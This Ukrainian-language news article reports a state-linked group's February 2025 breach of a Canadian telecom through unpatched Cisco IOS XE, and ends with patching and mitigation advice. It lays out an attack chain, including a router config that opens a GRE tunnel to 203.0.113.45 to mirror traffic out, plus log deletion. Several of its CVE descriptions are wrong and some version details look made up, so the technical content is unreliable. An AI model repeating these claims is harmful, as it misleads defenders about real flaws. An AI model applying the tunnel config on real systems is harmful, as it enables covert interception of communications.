Китайські хакери атакують канадський телеком через вразливості Cisco iOS XE

У середині лютого 2025 року один з провідних канадських телекомунікаційних постачальників став жертвою складної атаки групи, відомої як Сільський Тайфун, яка, за оцінками, діє на користь Народної Республіки Китай. Зловмисники використали вразливість CVE-2023-20198, серйозну уразливість Cisco iOS XE, виправлення якої було випущено у жовтні 2023 року. Попри те, що оновлення було доступне протягом понад 16 місяців, компанія жертва не застосувала його, що дозволило здійснити віддалене виконання коду та подальше розслідування мережі.

Огляд Загроз

Кіберцентр Канади та Федеральне бюро розслідувань США (FBI) випустили практично ідентичні попередження, в яких зазначається, що державні актори КНР продовжують націлюватися на телекомунікаційну інфраструктуру по всьому світу. Сільський Тайфун раніше зламав кілька американських операторів, включаючи Verizon та AT&T, використовуючи подібні тактики для перехоплення прослуховувань та витоку метаданих абонентів і мережі.

Технічні Деталі Атак

Специфікації Вразливостей

• CVE-2023-20198 (CVSS 10.0): Переповнення буфера HTTP(S) сервера в Cisco iOS XE версій до 17.6.2 дозволяє неавтентифіковане віддалене виконання коду на комутаторах, маршрутизаторах та бездротових контролерах LAN.
• CVE-2018-0171 (CVSS 9.8): Уразливість рекурсивної десеріалізації в функції Smart Install на пристроях IOS та IOS XE.
• CVE-2023-20273 (CVSS 9.8): Уразливість відмови в обслуговуванні в обробці UDP пакетів, спричинена обробкою фрагментованих пакетів.
• CVE-2024-20399 (CVSS 9.1): Уразливість проходження по шляху в модулі HTTP-клієнта, що впливає на логіку валідації SSL/TLS.

Сільський Тайфун об’єднав ці вразливості для забезпечення стійкості, підвищення привілеїв і горизонтального переміщення. Після отримання початкового доступу через CVE-2023-20198 вони витягли критично важливі конфігураційні дані, видавши команди show running-config через інтерфейс HTTP сервера.

Ланцюг Атаки та Маніпуляція Мережею

1. Використати переповнення буфера для запуску кореневого шеллу.
2. Отримати файли конфігурації, що містять рядки спільноти SNMP, NTP-сервери та списки управління доступом.
3. Впровадити запис тунелю Generic Routing Encapsulation (GRE) у running-config, змінивши файл:
   
   

   interface Tunnel500
   tunnel source GigabitEthernet1/0/1
   tunnel destination 203.0.113.45
   tunnel mode gre ip

4. Використати GRE тунель для віддзеркалення мережевого трафіку та витоку даних до вузла командно-контрольної системи.
5. Знищити сліди, видаливши журнали та відновивши безпечні конфігураційні знімки.

Хронологія Інциденту та Ширший Вплив

• Жовтень 2023: Cisco публікує виправлення для CVE-2023-20198 після публічного розкриття VulnCheck.
• Лютий 2024: Сільський Тайфун зламує кілька американських телекомунікаційних компаній, отримуючи доступ до платформ законного перехоплення.
• Листопад 2024: Cisco виправляє CVE-2024-20399 в умовах триваючих розслідувань.
• Середина лютого 2025: три мережеві пристрої канадського постачальника зламані через неоновлену CVE-2023-20198.
• Червень 2025: Кіберцентр Канади та FBI спільно попереджають громадськість, закликаючи до термінових заходів.

Тривалий період між випуском патчів та їх експлуатацією вказує на системні недоліки в управлінні патчами та пріоритизації ризиків серед телекомунікаційних операторів. Використання застарілого програмного забезпечення не лише порушує найкращі практики, але й підриває послуги, що залежать від безпечної інфраструктури.

Перспективи Експертів

«Телекомунікаційні мережі є основою критично важливих комунікацій. Коли противники, такі як Сільський Тайфун, отримують безшумний доступ, вони можуть перехоплювати голосові дзвінки, метадані SMS та навіть повідомлення контрольного плану 5G», – зазначає доктор Олена Решетова, старший аналітик Mandiant Intelligence. «Заходи захисту повинні включати як ретельне патчування, так і безперервний моніторинг конфігурацій пристроїв».

«Організації часто сприймають мережеве обладнання як елемент, який можна налаштувати і забути. Це самозадоволення саме те, що використовують вдосконалені постійні загрози», – Бретт Келлоу, аналітик загроз Emsisoft.

Глибокий Технічний Аналіз

У цьому розділі розглядається, як Сільський Тайфун оптимізував низькорівневі вразливості для роботи в умовах обмежених ресурсів на вбудованих системах. Використовуючи ланцюги програмування, орієнтованого на повернення (ROP), проти парсера HTTP, вони досягли високої надійності в корупції пам’яті без активації внутрішніх засобів захисту Cisco. Група використовувала спеціальні бекдори, замасковані під рутинні TLS-сесії, щоб уникнути глибокої перевірки пакетів.

Управління Патчами та Найкращі Практики

Оператори телекомунікацій повинні вжити проактивних заходів щодо патчування, особливо для пристроїв, які підключені до Інтернету. Рекомендуються такі дії:

• Автоматизоване сканування вразливостей з інтеграцією даних CVE.
• Налаштування без дотиків, що забезпечує мінімальні версії прошивки.
• Рішення для контролю доступу до мережі (NAC), такі як Cisco ISE, для карантину несумісних пристроїв.
• Регулярні резервні копії running-config та startup-config на незмінне сховище.

Глобальні Тенденції у Хакерських Атаках на Телекомунікації, Спонсорованих Державою

Групи APT, пов’язані з державами, активізували свої зусилля на телекомунікаціях у 2025 році, експлуатуючи прогалини в основних мережах 5G та віртуалізаційних платформах. Останні попередження від CISA США та ENISA ЄС застерігають про схожі кампанії, що проводяться групами, пов’язаними з Росією, які націлюються на архітектуру VoLTE.

Стратегічні Наслідки та Майбутні Перспективи

З огляду на стратегічну важливість телекомунікаційної інфраструктури, яка підтримує екстрені служби, банківську діяльність та національну безпеку, ризики виходять далеко за межі комерційних втрат. Кіберцентр Канади прогнозує подальші атаки протягом наступних двох років, закликаючи постачальників посилити як апаратне, так і віртуалізовані мережеві функції (VNF) проти нових нульових днів.

Рекомендації щодо Пом’якшення

1. Негайно оновити всі пристрої Cisco до останніх версій iOS XE (17.7.1 або новіших).
2. Вимкнути невикористовувані сервіси (наприклад, ip http server, ip http secure-server).
3. Впровадити суворі ACL, обмежуючи управлінські інтерфейси до відомих адміністративних підмереж.
4. Впровадити сегментацію мережі та мікросегментацію, щоб зменшити горизонтальний рух.
5. Використовувати інструменти автоматизації, оркестрації та реагування на безпеку (SOAR) для прискорення реагування на інциденти.